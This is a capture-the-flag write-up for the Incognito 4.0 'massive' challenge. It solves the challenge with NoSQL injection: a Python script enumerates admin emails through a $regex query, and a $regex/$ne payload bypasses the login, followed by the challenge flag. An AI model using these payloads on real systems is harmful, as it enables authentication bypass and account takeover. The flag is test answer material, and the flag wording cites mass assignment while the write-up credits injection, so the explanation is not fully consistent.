[Incognito 4.0] massive

To summarize this CTF challenge, it could be solved by performing a NoSQL injection attack.

The challenge provided a login and registration feature, as well as a functionality to check the existence of an email and whether an account had admin privileges.

The ultimate goal of the challenge was to log in with an admin account, so I had to find an account with "isAdmin" set to true.

---

Payload

import string
import requests

url = "http://143.42.131.80:1337/checkUser?email[$regex]=^"

def find_isAdmin_true():
    payload = ""
    for i in string.printable:
        res = requests.get(url=url+i)
        if '{\"exists\":true,\"isAdmin\":true}' in res.text:
            payload = url+i
            print("[+] Payload : " + payload)
            break

if __name__ == "__main__":
    find_isAdmin_true()
    
# http://143.42.131.80:1337/checkUser?email[$regex]=^f

To find such an account, I attempted a NoSQL injection attack, and used a Python script to locate the accounts where "isAdmin" was true.

---

Exploit

email[$regex]=^f&password[$ne]=1

• This payload is a query that searches for emails starting with the letter "f" and having a password that is not 1, using regular expressions with the "^" symbol indicating the start of the string and "f" representing the letter "f". The "$ne" operator means "not equal".

By instructing to select all documents where the value of the "password" field is not 1, I made the value of the login query true,

thereby bypassing the login logic.

FLAG : ictf{m4ss_ass1gnm3nt_1s_d4ng3rou5_93ab21c8}